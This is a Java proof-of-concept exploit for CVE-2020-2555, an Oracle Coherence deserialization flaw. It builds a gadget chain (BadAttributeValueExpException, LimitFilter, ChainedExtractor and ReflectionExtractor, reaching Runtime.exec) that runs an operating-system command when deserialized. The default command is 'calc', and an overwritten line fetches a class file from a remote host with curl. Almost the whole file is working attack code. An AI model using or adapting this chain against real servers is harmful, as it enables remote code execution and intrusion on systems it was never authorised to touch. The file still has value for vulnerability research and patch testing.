import com.tangosol.util.ValueExtractor;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import com.tangosol.util.filter.LimitFilter;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;

/**
 * Title: Poc
 * Descrption: CVE-2020-2555 漏洞利用 POC
 * Gadget chain:
 *        ObjectInputStream.readObject()
 *            BadAttributeValueExpException.readObject()
 *                LimitFilter.toString()
 *                    ChainedExtractor.extract()
 *                            ReflectionExtractor.extract()
 *                                Method.invoke()
 *                                    Class.getMethod()
 *                            ReflectionExtractor.extract()
 *                                Method.invoke()
 *                                    Runtime.getRuntime()
 *                            ReflectionExtractor.extract()
 *                                Method.invoke()
 *                                    Runtime.exec()
 * Date:2020/3/10 10:19 上午
 * Email:woo0nise@gmail.com
 * Company:www.j2ee.app
 *
 * @author R4v3zn
 * @version 1.0.0
 */
public class Poc {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        String cmd = "curl http://10.10.10.172:9999/Poc.class";
        cmd = "calc";
        ValueExtractor[] valueExtractors = new ValueExtractor[]{
                new ReflectionExtractor("getMethod", new Object[]{
                        "getRuntime", new Class[0]
                }),
                new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}),
                new ReflectionExtractor("exec", new Object[]{new String[]{"cmd", "/c", cmd}})
//                new ReflectionExtractor("exec", new Object[]{new String[]{"/bin/bash","-c", cmd}})
        };
        // chain
        LimitFilter limitFilter = new LimitFilter();
        limitFilter.setTopAnchor(Runtime.class);
        BadAttributeValueExpException expException = new BadAttributeValueExpException(null);
        Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
        m_comparator.setAccessible(true);
        m_comparator.set(limitFilter, new ChainedExtractor(valueExtractors));
        Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
        m_oAnchorTop.setAccessible(true);
        m_oAnchorTop.set(limitFilter, Runtime.class);
        Field val = expException.getClass().getDeclaredField("val");
        val.setAccessible(true);
        val.set(expException, limitFilter);
//        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("/Users/0nise/IdeaProjects/vuldebug/cve-2020-2555/src/main/java/122130_linux_calc.666"));
//        objectOutputStream.writeObject(expException);
//        objectOutputStream.close();
//        java.lang.Runtime.getRuntime();

        // 序列化测试
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bytes);
        oos.writeObject(expException);
        oos.close();
//        反序列化
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes.toByteArray()));
        BadAttributeValueExpException newUser = (BadAttributeValueExpException)ois.readObject();
        System.out.println(newUser.toString());
    }
}
